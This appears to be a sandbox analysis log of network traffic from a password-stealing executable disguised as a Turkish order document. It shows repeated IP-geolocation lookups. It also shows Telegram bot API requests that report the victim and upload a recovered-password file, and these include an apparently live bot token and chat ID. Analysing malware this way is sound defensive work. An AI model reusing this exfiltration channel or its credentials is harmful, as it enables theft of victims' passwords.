                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NvbTRVqaP6084RpV%2F4eg%2Bg7Qz%2BUQviiTeHxC%2Bgbyn2jeBCrLHfbP7pGblm6Ogschqi2s5Q8McmDGbGX%2Bb9NkY%2B8WeVnulg%2F%2BHAw8hEZp4uYF9UOYzEshfuw3nRIddL2TNTImDtjc"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff66115ef097c6a-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1992&min_rtt=1989&rtt_var=752&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1448412&cwnd=218&unsent_bytes=0&cid=5923c83edc640073&ts=150&x=0"
                                                                                                    2025-01-09 18:09:35 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    2192.168.2.749708104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:37 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:37 UTC853INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:37 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760966
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JPnuoBaRc2RN8U9MO2FJNxhmQWvkTSKhHsaJosfjKowuOvZLpDAFnPLOyEgB8yJYJzCs7i3a0X5qzrVQsyBNiYQLRXw3fBnoU%2B%2F4it9Kr40gkQplgE2xf1MBeyDBPhG09SmcuY8Z"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff6611f2b777c6a-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1968&rtt_var=767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1399808&cwnd=218&unsent_bytes=0&cid=b623bd25ba913574&ts=142&x=0"
                                                                                                    2025-01-09 18:09:37 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    3192.168.2.749712104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:38 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:38 UTC859INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:38 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760967
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=l6A5u85DfsRePLnmEoh8igl26aqIDY0q2p96rR1LYilgy8NLrPdrJFiL2vXZ1x7DRvWZ%2BRC7gqUo5Na%2BdoI2TTj1QSkEyS99Xgo4lhFFhgaDsBkb%2BdJBbPW5CVpm%2BF9Q8OgjTPQL"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff6612809c5de95-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=16134&min_rtt=1657&rtt_var=9334&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1762220&cwnd=242&unsent_bytes=0&cid=e44ba07c2fe21601&ts=150&x=0"
                                                                                                    2025-01-09 18:09:38 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    4192.168.2.749719104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:39 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:39 UTC857INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:39 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760969
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NVXg1FVO7K5KPeMMslRxEJNi2nG4pr0%2BZCWPea57l%2FmPabSejfxa235hb0B2ndaqUHob%2Bk0AakRI%2BhNHp4R3R87sryc3mNxW4oeUfUCmiesCZ0j9JYLY1lUosOpCFthgAfHoy46Q"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff661307ce67c6a-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1998&min_rtt=1992&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1428571&cwnd=218&unsent_bytes=0&cid=a7818247df0100fe&ts=176&x=0"
                                                                                                    2025-01-09 18:09:39 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    5192.168.2.749731104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:41 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:41 UTC861INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:41 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760970
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=GD0RQT8s91%2BtXtJ%2B3BYiiLtJ4T1%2FU4vZHdWlxBfeq7RUichDtbEw2sTdQ%2FrWPBL1hW%2B%2B1Rk50u0szmGoHT7omeT0f68BUKnHF9igNoyv8r9d3GjCRVooI7Hzl69AqWWFHmoIpLFX"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff66138c8d88ca1-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1995&min_rtt=1988&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1425781&cwnd=168&unsent_bytes=0&cid=bdf9348b0ded5716&ts=160&x=0"
                                                                                                    2025-01-09 18:09:41 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    6192.168.2.749743104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:42 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:43 UTC853INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:42 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760972
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ur7rPeXVQFIQJ9o8UF6iPlcqrA3fP2CG%2Bf0VW4aj6DMNmHkUkEAA0%2B93yiXJcOyefXbjFvUEUJN%2BPJSlG2JPAw2zlBGDUz9LWTpee4QH4zllOQ22OVYSpvM9bnWTdgzBF20jybOT"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff661437f1b42e9-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1692&min_rtt=1692&rtt_var=846&sent=7&recv=8&lost=0&retrans=1&sent_bytes=4236&recv_bytes=699&delivery_rate=39864&cwnd=240&unsent_bytes=0&cid=f3954125b37d3d94&ts=348&x=0"
                                                                                                    2025-01-09 18:09:43 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    7192.168.2.749750104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:44 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:44 UTC863INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:44 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760973
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UUlshyDakwv2Kxvw3kMGGPKbxO7Y2zsjlYAMjVOU%2FdrCTOfVVvKUgXmFd%2FtArOxiv%2BIeXYX8AEM7JTW%2FdZR%2FfKyu0E3WmDO%2BS0LPikCNv2%2BDGy8ZYoAjTIXwYcleq2sXhA0Y9JJn"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff6614c68414414-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1741&rtt_var=664&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1634023&cwnd=180&unsent_bytes=0&cid=72f25c80d22b2175&ts=160&x=0"
                                                                                                    2025-01-09 18:09:44 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    8192.168.2.749759104.21.64.14432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:45 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                    Host: reallyfreegeoip.org
                                                                                                    2025-01-09 18:09:45 UTC861INHTTP/1.1 200 OK
                                                                                                    Date: Thu, 09 Jan 2025 18:09:45 GMT
                                                                                                    Content-Type: text/xml
                                                                                                    Content-Length: 362
                                                                                                    Connection: close
                                                                                                    Age: 1760974
                                                                                                    Cache-Control: max-age=31536000
                                                                                                    cf-cache-status: HIT
                                                                                                    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=j1P2XBYTDu60gPXlS1U%2BDTflmS9OeFs4yT7JiLgWpakBP%2FQDrgxQ9jzzhEJ1%2BJGNgDwaCUAGYz6L5mYx31ppvDr%2B95zoaOsDx3tYR3ccz%2BLPF3c3J9sXRRg%2BVGvP7I8GcsTm6Cmi"}],"group":"cf-nel","max_age":604800}
                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                    Server: cloudflare
                                                                                                    CF-RAY: 8ff66154fded42e9-EWR
                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=1798&min_rtt=1794&rtt_var=681&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1595628&cwnd=240&unsent_bytes=0&cid=904a58ab7dc69547&ts=147&x=0"
                                                                                                    2025-01-09 18:09:45 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                    Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    9192.168.2.749760149.154.167.2204432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:46 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2010/01/2025%20/%2001:33:56%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                    Host: api.telegram.org
                                                                                                    Connection: Keep-Alive
                                                                                                    2025-01-09 18:09:47 UTC344INHTTP/1.1 404 Not Found
                                                                                                    Server: nginx/1.18.0
                                                                                                    Date: Thu, 09 Jan 2025 18:09:47 GMT
                                                                                                    Content-Type: application/json
                                                                                                    Content-Length: 55
                                                                                                    Connection: close
                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                    Access-Control-Allow-Origin: *
                                                                                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                    2025-01-09 18:09:47 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                    Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                    10192.168.2.749808149.154.167.2204432020C:\Users\user\Desktop\fiyati_teklif 65TBI20_ ON-SAN Vakum san tic_ Sipari#U015fi jpeg docx .exe
                                                                                                    TimestampBytes transferredDirectionData
                                                                                                    2025-01-09 18:09:54 UTC353OUTPOST /bot7611127374:AAGXC2jAyl-P1rRPCEhU4dJbqLtPBhqL70U/sendDocument?chat_id=-4732682041&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1
                                                                                                    Content-Type: multipart/form-data; boundary=------------------------8dd31724386f0b9
                                                                                                    Host: api.telegram.org
                                                                                                    Content-Length: 585
                                                                                                    2025-01-09 18:09:54 UTC585OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 33 31 37 32 34 33 38 36 66 30 62 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 50 57 5f 52 65 63 6f 76 65 72 65 64 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 66 72 6f 6e 74 64 65 73 6b 20 7c 20 56 49 50 20 52 65 63 6f 76 65 72 79 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 39 37 31 33 34 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 30 39 2f 30 31 2f 32 30 32 35 20 2f 20 31 33 3a 30 39
